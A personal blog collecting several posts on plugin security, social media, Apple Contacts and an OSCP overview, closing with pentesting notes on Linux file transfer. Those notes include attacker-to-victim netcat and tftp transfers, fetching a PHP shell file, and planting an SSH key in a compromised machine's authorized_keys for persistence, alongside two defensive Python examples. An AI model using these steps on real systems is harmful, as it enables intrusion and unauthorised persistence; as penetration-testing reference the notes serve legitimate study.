Obsidian.md and Plugin Security

Obsidian.md is an awesome note taking system. However, any third party plugin you install has access to all the files on your computer. You must hope the developer is nice or that their GitHub credentials don’t get compromised by a bad actor who then pushes out a malicious update.

The barrier to entry to get a plugin added to the Obsidian marketplace is low, and the review is performed only once. There is no follow-up security review.

Common retorts to these statements, and my replies:

  • It’s the same thing as X app (VS Code, e.g.)
    My reply: Yes, and that is also bad.
  • Plugins with many users are safer because they have more eyes reviewing the code
    My reply: Yes, and they are also the more attractive targets. A contributor needs only enough time to push a bad update that no one notices in order to infect thousands of computers. So like, 20 minutes?
  • I don’t put anything valuable or private in my notes anyway
    My reply: How about the rest of your computer? Because that’s what they have access to.

In summary, if you use Obsidian, don’t use plugins until or unless they improve this situation.

Getting out of it what you put into it

It’s been difficult to make myself come here and blog.

Somewhere along the way, things on the internet changed. I used to enjoy writing updates in a blog post, letting friends and family know what had been going on around here, what I was up to, or even just what I was thinking. I knew that there were certain people who followed my blog pretty frequently and would often comment or even just acknowledge that I had posted something. It was a nice community feeling, and I would read other people’s blogs as well. Somewhere along the way this all shifted. I think it probably had something to do with Facebook becoming the predominant platform for people posting updates and being able to keep up with many more people in that format.

It’s a real shame though, because now I’ve gotten myself off of Facebook, off of Instagram, off of Twitter, and I’m largely just biding my time here and on Bluesky.

I find myself not wanting to share content or updates or news or anything like that. I definitely feel more guarded about what I share online.

Perhaps it’s because of all the horror stories I’ve read about people getting stalked or swatted or whatever, just because they said something someone else didn’t like or disagreed with. I’ve been thinking often about how the internet really has precipitated the downfall of humanity. It’s pretty sad because I thought it was going to be an awesome thing for quite a while.

It definitely had an un-jaded, innocent adolescence phase. However, what happened was that once the World Wide Web became more and more accessible and was starting to be carried around in everyone’s pockets, everything started to change for the worse.

I remember back in college I took a class on how to use the World Wide Web. It was a great introduction into internet culture, what it meant to have a flame war, what spam was, and what good netiquette was.

That’s a word you don’t really hear anymore. Netiquette. It’s a shame. Everyone thinks they have the right to just get very angry at everyone else now, and it’s taken a lot of the fun out of the whole thing.

Maybe if people had been required to take lessons about the internet in order to access it, and had to learn how easily you can be fooled by misinformation and how you need to be able to discern between what’s real and what’s not, we might not be in the predicament we’re in today.

So I don’t know, maybe I’ll take this blog down in the near future. Is anyone reading it? My web statistics say “no”. So this is pretty much an exercise in talking into the ether. I’m putting things into it, but getting out nothing.

The Toxic Utility of AI

If you’ve ever ventured onto the social media platform called BlueSky (which, I do love and is the only social platform I am on), or certain corners of other platforms like Reddit, you will likely have run across a very passionate set of people who disavow and berate anything related to artificial intelligence technology. They get so rabid in their attacks, they lose sight of the fact that AI actually has some usefulness when applied to certain situations that don’t invade privacy, don’t steal intellectual property, and don’t do things without asking you. However, if you try to point this out, you will get blocked, banned, ridiculed, and blasted for bringing it up. There seems to be no middle ground for these anti-AI people.

It’s very unfortunate. I wholly sympathize with a lot of their concerns. I don’t like the fact that AI is using intellectual property such as artwork, writing, music, and a host of other things that humans have created in order to train itself. I don’t like that this is usually done without asking anyone for their permission. And I don’t like that we’re in this situation where we have to claw back what AI has taken from us. I totally understand why that has pissed some people off entirely because it has pissed me off for the same reasons.

I recently saw someone on LinkedIn post that AI is just a glorified spell checker. And I actually agree. It’s not creative. It’s not smart. It doesn’t make decisions on its own. It relies on everything that it has been fed. So it’s really way less than it’s cracked up to be in many ways.

All of that being said, there are absolutely worthwhile use cases for artificial intelligence.
Personally, I’ve started using voice dictation with AI-assisted technology to help me speed up typing and relieve my aging fingers that have gotten slower and are usually aching by the end of a long workday. I’m enjoying that aspect of AI very much.
In fact, this whole article was written by me using a voice-to-text app called VoiceInk. It does such an incredible job at recognizing my speech patterns, pauses, and corrections of myself. These things weren’t possible just a few years ago with any sort of voice-to-text application. And it does it fast.

Anyway, these are just some thoughts I’ve had bugging me and I decided to get them out there.

Cleaning Up Apple Contacts

Apple Contacts get out-of-sync and become a mess over time, especially if you have multiple email accounts and have amassed a collection of contacts over the years. This problem was driving me nuts for quite a while, so I finally decided to sit down and fix it. Since it wasn’t simple to research, but ended up being simple to fix, I thought I’d share the solution. I am drawing upon some guidance I found on Reddit, but adding some additional tips.

The solution is to get all your devices (iPhone, Mac, iPad, etc) to only use iCloud to sync your contacts. In my case, I had contacts split across multiple email accounts I had collected over the years, and they didn’t sync up. Some cleanup is required.

Pre-requisites

You need both a computer and your phone for this.

Solution

  • Go to your iPhone Contacts app.
  • Click the top-left corner where it says “Lists”:
  • You will see all the accounts housing your contact on this page.
  • At the top of this list is “All Contacts”, which is a collection of everything you see below it. Long press the “All Contacts” line (this is the merged list of all Contacts from different accounts). You’ll see an option to export all contacts.
  • Export the backup file (All Contacts.vcf) to your email or iCloud Drive or Airdrop. Whichever you choose, the goal is to send it to your computer and save it there.
  • Log in to iCloud.com from a browser on your computer. This can’t be done from your iPhone.
  • Go to Contacts in iCloud.com and click the + sign, then select Import Contact.
  • Import the VCF file you just saved to your computer.
  • This may end up creating multiple copies of some of your contacts, which is OK, because we will soon merge and remove duplicate contacts.
  • BUT FIRST, you will need to stop syncing contacts for all the accounts you see on your iPhone and your Mac (and any other device), and only sync contacts to iCloud. Here’s what it looks like on the Mac:
  • For each account listed, open it and un-check Contacts.
  • Do the same on your other devices. Have them sync contacts only via iCloud.
  • Back on your phone, load up the Contacts app again.
  • It should notify you of the duplicates it found. You can safely click Merge. It may take a little time to sync up, depending on how many contacts you have, but this should solve all of your problems!

LinkedIn is at Peak Enshittification

💡
These are my personal opinions, which exist in an entirely segmented realm of my brain and my existence than that of my employer. They are not associated.

This is a story about the enshittification of LinkedIn. You are probably familiar with it.

I’ve been on LinkedIn for about 20 years. It started as a useful way to demonstrate my work experience, connect with current and past coworkers, and build business relationships. It was useful as a digital calling card of sorts.

At security conferences, I’d quickly pull up the app on my phone and befriend someone I had just met and had a conversation with. We’d keep in touch and Like or comment on each other’s LinkedIn posts.

Admittedly, most of those connections I made would never become anything else. We didn’t continue any real-world conversations or reach out to each other at all. These “friends” just became reminders of a short conversation I once had at a conference or workshop. I started wondering what the use of this site was, yet, everyone seemed to be using it, so I found myself curiously coming back once in a while.

Persistent Outreach

I can’t pick out an exact point in time that it started happening, but there was a noticeable shift in the kinds of connection requests I started getting. Maybe it coincided with my job title changes as they evolved and became more desirable for marketers to reach out to. Maybe it coincided with LinkedIn becoming a marketing person’s fertile playground. I am not sure, but something shifted.

One change I did notice, and I never felt like figuring out why, is that I started getting Followers in addition to people asking me to Connect. Some people would Follow me and then ask to Connect later. LinkedIn never did anything noticeable to explain what this all meant, but it happened.

Who? Why?

It was confusing, and I never felt like looking into it, so I just started ignoring them.

Sales Pitches

Everything started turning into sales pitches: requests to “run something by you,” get “10 minutes of your time,” show me an article they’d “really like your opinion on.” All in the name of making a connection –and possible sales lead– to meet a quota in SalesForce (most likely).

They even tried bribery in the form of sending me an Amazon gift card, just to meet with them for 30 minutes and hear their pitch. I know for a fact, based on experience, this would only lead to even more persistent follow-ups, “ticklers”, and pressure tactics to sell to me.

I stopped going to LinkedIn as much.

Overly Persistent Salespeople

Within the last 2 years, I started getting connection requests alongside immediate follow-ups to my work email, and it became clear that I needed to look into things – or shut down my LinkedIn account. Some setting somewhere must have changed, but I wasn’t sure what.

I was sure, however, that I had never put my work email address into LinkedIn. Yes, it was probably easy to guess based on who I work for, but this cold-calling tactic was sleazy and would immediately turn me off to any reputable vendors, especially when they had been annoyingly persistent by sending me multiple “just let me know if you’d like me to stop bugging you” types of emails.

In short: if you are a salesperson, please don’t do this.

Silent Privacy Changes

The company has implemented some invasive changes over the years, and didn’t bother to tell users – or buried the notices deep in their TOS that no one read. Their lack of privacy by default has always been concerning. Some of these were questionable, others, such as opting you in to AI training, were mind-boggling. There was even a short-lived lawsuit about that.

[Screenshot: The AI setting you didn’t know about.]

LinkedIn’s True Enshittification

The true indicator that we had reached the event horizon in the downfall of LinkedIn occurred sometime in the last year.

I logged in one day and saw that posts and comments had turned vitriolic. They had become like Twitter, like the comment section on your local newspaper’s website, or just about any thread on NextDoor these days.

[Screenshot: An Executive Director!]

People were making terrible statements with their employer’s name associated with them.

Posting your pronouns was never required. Why is it such a problem anyway?

Yes, it coincides with the political climate in the USA and the general climate of intolerant “free speech” that has proliferated everywhere as a result. But in a setting of professional profiles closely tied to employers? Why risk your job, your customer base, or your reputation?

[Screenshots: “Listener”; even using the “R” word.]

I will just say this about that: we are all humans, we all deserve equal opportunity to live, love, and thrive. You know, that whole “Life, Liberty, and the Pursuit of Happiness” thing.

Live and let live. Do unto others as you would have them do unto you. A rising tide lifts all boats. You know…basic decency to others.

LinkedIn is now complicit in stifling these pursuits.

I am at a loss for any further words, really. Having left Facebook, Instagram, and Twitter within the last month, I am now shutting down my LinkedIn profile.

Indeed.

— willc

Bugs inside the house?

No, not the smart home management variety that are always listening (looking at you, Siri, Alexa, and Google Home), or the kind that spies of yore used (or maybe still use?) to listen in on your dinner plans or football watching habits.

No, I am referring to actual bugs. Insects. Things that are highly annoying when they get into your home. We get these often in our house, as doors tend to get left open due to our indoor/outdoor lifestyle in the warmer months.

From mosquitos to house flies to various types of gnats and stinging things, we tend to get them all.

Aspectek Bug Zapper To The Rescue

On a whim, I bought one of these Aspectek bug zappers off Amazon, and it has been the best $40 I ever spent. In fact, I ended up buying a second one to keep in the basement since the one on the main floor worked so well. It attracts ’em, it zaps ’em, it splats ’em.

There are few downsides, however. First is that the zapping noise is rather loud, but that is also satisfying in a demented way.

Second is that the bugs don’t always fall into the removable tray at the bottom, so expect to wipe or vacuum some of them up.

Lastly, some of the bigger bugs this thing has zapped, including large flies and hornets, tend to linger a bit and get zapped repeatedly. In fact, they start smoldering on occasion, which isn’t the most pleasant thing when it comes to household smells. But I tend not to be bothered by that sort of thing.

The good news is my cats leave it alone and are not interested in it, and we don’t get eaten by mosquitos at night in our own house!

All In One SEO Plugin in 2024: Avoid it like the plague

I updated the All In One SEO Plugin on this website today. The next thing I knew, I had two new plugins installed for me, the Monsterinsights and some sort of opt-in plugin called Optinmonster.

Yeet!

I deleted all that shit faster than you can throw a watermelon off an overpass. After googling around a bit to figure out what had happened, I discovered this post that keyed me in to what was going on:

MonsterInsights is Auto-installed
https://wordpress.org/support/topic/monsterinsights-is-auto-installed/

This is a terrible practice I hope no other WordPress plugin developers emulate. If you do, I hope the community shames you into reconsidering your ways.

Why is this so bad? Let me enumerate the ways:

Installing one plugin should never, EVER install more plugins without giving a person the awareness that this is happening! It’s bad form, it’s stealing a website’s resources, it’s stealing screen real estate, it’s introducing unknown risk, and broadening your website’s threat profile without telling you.

Then you get all these banners asking you to set up all these paid connections for these plugins to work. Bad form, again!

The Kicker

To top it all off, after walking through the All In One SEO setup steps, I found an email waiting for me moments later:

I did not opt in for this! This egregious action is most certainly in violation of the US CAN-SPAM laws. I can’t wait to report them. In fact, I will go do that now.

Ok, I feel a little better now.

If you offer a plugin for people to use, you should never assume they want MORE plugins installed, and never grab their email address from their WordPress settings to sign them up for ANYTHING outside of your plugin.

The Offensive Security Certified Professional (OSCP) Exam

The Offensive Security Certified Professional (OSCP) exam is known for being one of the most challenging certification exams in the cybersecurity field. It’s a hands-on test of your ability to identify and exploit vulnerabilities in a live, virtual environment.

The exam is not for the faint of heart. It requires a significant amount of time and effort to prepare, and even experienced security professionals may find it difficult to pass. In fact, the pass rate for the OSCP exam is typically less than 50%.

So, what makes the OSCP exam so challenging? For starters, it’s an extremely hands-on exam. Rather than simply testing your knowledge of security concepts, it requires you to actually demonstrate your skills by completing a series of real-world challenges. This means you need to have a strong foundation in security principles and a practical understanding of how to identify and exploit vulnerabilities.

In addition, the exam is time-limited. You have just 24 hours to complete the challenges and submit your results. This means you need to be able to work quickly and efficiently under pressure.

So, how can you prepare for the OSCP exam and improve your chances of passing? Here are a few tips:

  1. Take the OSCP training course. The OSCP exam is designed to test the skills and knowledge you gain from the Offensive Security Penetration Testing with Kali Linux (PwK) course. This course provides a comprehensive introduction to the tools and techniques used by professional penetration testers, and is an essential foundation for anyone looking to take the OSCP exam.
  2. Practice, practice, practice. The best way to prepare for the OSCP exam is to get hands-on experience with the tools and techniques you’ll be tested on. This means setting up your own lab environment and practicing your skills on a regular basis.
  3. Work through the lab challenges. The OSCP exam includes a series of lab challenges that test your ability to identify and exploit vulnerabilities in a live, virtual environment. Completing these challenges will give you a good idea of the types of tasks you’ll be expected to perform during the exam, and can help you develop the skills and confidence you need to succeed.
  4. Get support from the community. The OSCP exam can be a daunting and isolating experience, but you don’t have to go it alone. There are many online communities and forums where you can connect with other OSCP exam takers and get support, advice, and encouragement.

Overall, the OSCP exam is a challenging but rewarding experience. By preparing thoroughly and staying focused, you can increase your chances of success and earn one of the most respected certifications in the cybersecurity field.

—–

This entire blog post was created by artificial intelligence. Text by ChatGPT. Photo by Midjourney.

Self Hosting – Cloudron

I have been using Cloudron recently, and after initially trying it out a couple of years ago, I found it to be a really easy, awesome way to create my own personal cloud, keeping the prying eyes of big tech out of my life.

So far I have been using Cloudron to manage my OnlyOffice instance (better than MS Office or Google Docs) and my instance of Nextcloud, a Google Drive-like file storage and sharing center. They integrate with each other to create your own secure, private office suite with file storage.

The best part is that you can do all this simply from the DigitalOcean Marketplace – a one-click shop for easy installation of everything. All you need is a domain name to point at it.

Once you have it installed, you can set it and forget it, as Cloudron will keep itself updated, patched, and secure.

Cloudron Coupon Code

It isn’t cheap to run Cloudron, but it lets you host two apps without a subscription. I have yet to find a working Cloudron coupon code out there, but there are Cloudron referral codes such as my own (https://cloudron.io/?refcode=901142a319d1498b) which earn the referee a small discount. Once you have your own Cloudron account set up, you can use your own referral code and encourage others to use it.

So that is me encouraging you to use my referral code 😀

Linux File Transfer Techniques

Digging through my pentesting notes from over the last few years, I pulled together various scrawled things on quick ways to transfer files from one place to another. Thought I’d share the reference here in case anyone finds it useful.

Note: Some of this may have been copy/pasted from various places — I don’t honestly remember. If you recognize something, let me know – I am happy to give credit where credit is due!

Simple Python HTTP Server

This is an easy way to set up a web server. The command below makes the entire folder you run it from available on port 9999 (on Python 2 the equivalent module was SimpleHTTPServer; on Python 3 it is http.server):

python3 -m http.server 9999

Wget

You can download files from that running Python server using wget like this:

wget 192.168.1.102:9999/file.txt

Curl

curl -O http://192.168.0.101/file.txt

Netcat

Another easy way to transfer files is by using netcat.

If you don’t have an interactive shell, starting a listener on the target is risky: if the attacking machine turns out to be unable to connect, you are left hanging and can’t press Ctrl-C, because that would kill your session.

So instead you can connect from the target machine like this.

On attacking machine:

nc -lvp 4444 < file

On target machine:

nc 192.168.1.102 4444 > file

You can of course also do it the risky way, the other way around:

So on the victim-machine we run nc like this:

nc -lvp 3333 > enum.sh

And on the attacking machine we send the file like this:

nc 192.168.1.103 3333 < enum.sh

I have sometimes received this error:

This is nc from the netcat-openbsd package. An alternative nc is available

I have just run this command instead:

nc -l 1234 > file.sh

Socat

Server receiving file:

server$ socat -u TCP-LISTEN:9876,reuseaddr OPEN:out.txt,creat && cat out.txt
client$ socat -u FILE:test.txt TCP:127.0.0.1:9876

Server sending file:

server$ socat -u FILE:test.dat TCP-LISTEN:9876,reuseaddr
client$ socat -u TCP:127.0.0.1:9876 OPEN:out.dat,creat

With php

echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php

Ftp

If you have access to an ftp client you can of course just use that. Remember, if you are uploading binaries you must use binary mode, otherwise the binary will become corrupted!!!
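The netcat and socat recipes above and the FTP binary-mode warning share one point: a raw TCP push has no integrity check of its own, so the receiving side should compare a digest before trusting the file. The following is an added example, not part of the original notes, that runs both ends of such a transfer on 127.0.0.1 (an ephemeral port chosen by the kernel, so nothing on the page's IPs is used) and then emulates what ASCII-mode FTP does to a binary so the digest mismatch is visible. The sample payload and the ascii_mode_corrupt helper are constructed for the demonstration.

```python
"""Loopback demonstration of a raw TCP file push with an end-to-end digest check.

Added example, not from the original notes. Mirrors the netcat/socat pattern:
one side listens and writes whatever arrives, the other side connects and
streams the file. The digest comparison is what the notes leave implicit.
"""
import hashlib
import socket
import threading


def sha256_hex(data: bytes) -> str:
    """Digest to compare on both ends (sha256sum on Linux prints the same hex)."""
    return hashlib.sha256(data).hexdigest()


def receive_file(listener: socket.socket) -> bytes:
    """Receiver side: accept one connection and read until the peer closes
    its write side (the role of `nc -l <port> > file`)."""
    conn, _peer = listener.accept()
    with conn:
        chunks = []
        while True:
            chunk = conn.recv(65536)
            if not chunk:  # peer shut down: end of file
                break
            chunks.append(chunk)
    return b"".join(chunks)


def send_file(host: str, port: int, data: bytes) -> None:
    """Sender side: connect, stream the bytes, then half-close so the receiver
    sees EOF (the role of `nc <host> <port> < file`)."""
    with socket.create_connection((host, port)) as conn:
        conn.sendall(data)
        conn.shutdown(socket.SHUT_WR)


def ascii_mode_corrupt(data: bytes) -> bytes:
    """Constructed emulation of an FTP transfer in ASCII mode: every 0x0A byte
    is rewritten as CR LF, so a binary containing 0x0A changes size and digest."""
    return data.replace(b"\n", b"\r\n")


def transfer_over_loopback(data: bytes) -> tuple:
    """Run receiver and sender against 127.0.0.1 on a kernel-chosen port.

    Returns (received_bytes, digest_matches)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("127.0.0.1", 0))  # port 0: let the kernel pick a free port
    listener.listen(1)
    port = listener.getsockname()[1]

    result = {}
    receiver = threading.Thread(target=lambda: result.update(data=receive_file(listener)))
    receiver.start()
    send_file("127.0.0.1", port, data)
    receiver.join(timeout=10)
    listener.close()

    received = result.get("data", b"")
    return received, sha256_hex(received) == sha256_hex(data)


# Constructed sample payload: every byte value, including 0x0A, standing in
# for a binary such as a compiled tool.
SAMPLE_BINARY = bytes(range(256)) * 8

if __name__ == "__main__":
    received, ok = transfer_over_loopback(SAMPLE_BINARY)
    print(f"raw TCP push: {len(received)} bytes, digest match = {ok}")
    damaged = ascii_mode_corrupt(SAMPLE_BINARY)
    print(f"ASCII-mode emulation: {len(damaged)} bytes, digest match = "
          f"{sha256_hex(damaged) == sha256_hex(SAMPLE_BINARY)}")
```

The half-close in send_file is what lets the receiver distinguish "transfer finished" from "connection stalled"; it is the same thing the shell redirection does for nc when stdin hits EOF. Comparing sha256_hex output on both ends is the cheap check that catches the ASCII-mode corruption the FTP note warns about.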

Tftp

On some rare machines we have no access to nc, wget, or curl, but we might have access to tftp. Some versions of tftp are run interactively, like this:

$ tftp 192.168.0.101
tftp> get myfile.txt

If we can’t run it interactively, for whatever reason, we can do this trick:

tftp 192.168.0.101 <<< "get shell5555.php shell5555.php"

SSH – SCP

If you manage to upload a reverse shell and get access to the machine, you might be able to get in using ssh, which gives you a better, more stable shell and all the other features of SSH, such as transferring files.

So, in the /home/user directory you can find the hidden .ssh files by typing ls -la. Then you need to do two things.

Create a new keypair

You do that with:

ssh-keygen -t rsa -C "your_email@example.com"

then you enter a name for the key.

Enter file in which to save the key (/root/.ssh/id_rsa): nameOfMyKey
Enter passphrase (empty for no passphrase):
Enter same passphrase again:

This will create two files, one called nameOfMyKey and another called nameOfMyKey.pub. The one with the .pub extension is of course your public key, and the other is your private key.

Add your public key to authorized_keys

Now you copy the content of nameOfMyKey.pub. On the compromised machine you go to ~/.ssh and append the public key to the file authorized_keys, like this (note the >> so existing keys are kept):

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQqlhJKYtL/r9655iwp5TiUM9Khp2DJtsJVW3t5qU765wR5Ni+ALEZYwqxHPNYS/kZ4Vdv..." >> authorized_keys
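The step above is also exactly what a defender should be watching for: an extra line in authorized_keys is a quiet, durable way in. The following is an added example, not part of the original notes, that parses an authorized_keys file (options, key type, base64 blob, comment), computes each key's SHA256 fingerprint the way ssh-keygen -l prints it, and reports any line that is malformed or whose fingerprint is not on an allowlist. The key blobs and the sample file are constructed for the demonstration (toy moduli, not usable RSA keys); the KNOWN_KEY_TYPES set is the author's assumption of what to accept.

```python
"""Audit an OpenSSH authorized_keys file against an allowlist of key fingerprints.

Added example, not from the original notes. Flags unexpected or unparsable
entries; fingerprints use OpenSSH's 'SHA256:' + unpadded-base64 notation.
"""
import base64
import hashlib
import shlex
import struct

KNOWN_KEY_TYPES = {
    "ssh-rsa", "ssh-ed25519",
    "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521",
}


def _ssh_string(value: bytes) -> bytes:
    """RFC 4251 'string': 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(value)) + value


def _ssh_mpint(value: int) -> bytes:
    """RFC 4251 'mpint': a leading 0x00 is added when the top bit would be set."""
    return _ssh_string(value.to_bytes((value.bit_length() + 8) // 8, "big"))


def make_rsa_blob(e: int, n: int) -> bytes:
    """ssh-rsa public key blob: the bytes that the base64 column encodes."""
    return _ssh_string(b"ssh-rsa") + _ssh_mpint(e) + _ssh_mpint(n)


def fingerprint(blob: bytes) -> str:
    """SHA256 fingerprint in OpenSSH notation (what `ssh-keygen -lf` prints)."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def embedded_type(blob: bytes) -> str:
    """Key type stored inside the blob; it must agree with the declared type."""
    if len(blob) < 4:
        raise ValueError("blob too short")
    (length,) = struct.unpack(">I", blob[:4])
    return blob[4:4 + length].decode("ascii", "replace")


def parse_line(line: str):
    """Split one line into (options, key_type, blob, comment).

    Options such as command="..." may contain spaces, so the line is split with
    shell quoting rules; the first token that is a key type marks the boundary."""
    tokens = shlex.split(line)
    for index, token in enumerate(tokens):
        if token in KNOWN_KEY_TYPES:
            if index + 1 >= len(tokens):
                raise ValueError("key type without key material")
            blob = base64.b64decode(tokens[index + 1], validate=True)
            return tokens[:index], token, blob, " ".join(tokens[index + 2:])
    raise ValueError("no recognised key type on line")


def audit(authorized_keys_text: str, allowed_fingerprints: set) -> list:
    """Return one finding per line that is malformed or carries an unexpected key."""
    findings = []
    for lineno, raw in enumerate(authorized_keys_text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            options, key_type, blob, comment = parse_line(line)
            if embedded_type(blob) != key_type:
                raise ValueError("declared key type does not match key blob")
        except (ValueError, struct.error) as exc:
            findings.append({"line": lineno, "reason": f"malformed: {exc}", "fingerprint": None})
            continue
        fp = fingerprint(blob)
        if fp not in allowed_fingerprints:
            findings.append({"line": lineno, "reason": "fingerprint not in allowlist",
                             "fingerprint": fp, "comment": comment, "options": options})
    return findings


# Constructed key material: toy moduli, NOT usable RSA keys, so the example runs offline.
KEY_A = base64.b64encode(make_rsa_blob(65537, 0xC3A5C85C97CB3127B4D1)).decode()
KEY_B = base64.b64encode(make_rsa_blob(65537, 0xD9F2E6A4B1C7E5F3A1B9)).decode()
ALLOWLIST = {fingerprint(base64.b64decode(KEY_A))}

# Constructed authorized_keys content: one expected key, one unexpected key with
# forced-command options, and one unparsable line.
SAMPLE_AUTHORIZED_KEYS = f"""# managed by config management
ssh-rsa {KEY_A} alice@workstation

no-pty,command="/usr/bin/true" ssh-rsa {KEY_B} backup
ssh-ed25519 not-valid-base64!!! stray
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE_AUTHORIZED_KEYS, ALLOWLIST):
        print(finding)
```

Run against a real file with `audit(open(path).read(), allowlist)`, where the allowlist is the set of fingerprints your provisioning produces; because the fingerprint is taken over the decoded blob, it matches what ssh-keygen reports for the same key, so the allowlist can be built from that tool's output.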

Log in

Now you should be all set to log in using your private key, like this:

ssh -i nameOfMyKey kim@192.168.1.103

SCP

Now we can copy files to a machine using scp:

# Copy a file:
scp /path/to/source/file.ext username@192.168.1.101:/path/to/destination/file.ext
# Copy a directory:
scp -r /path/to/source/dir username@192.168.1.101:/path/to/destination
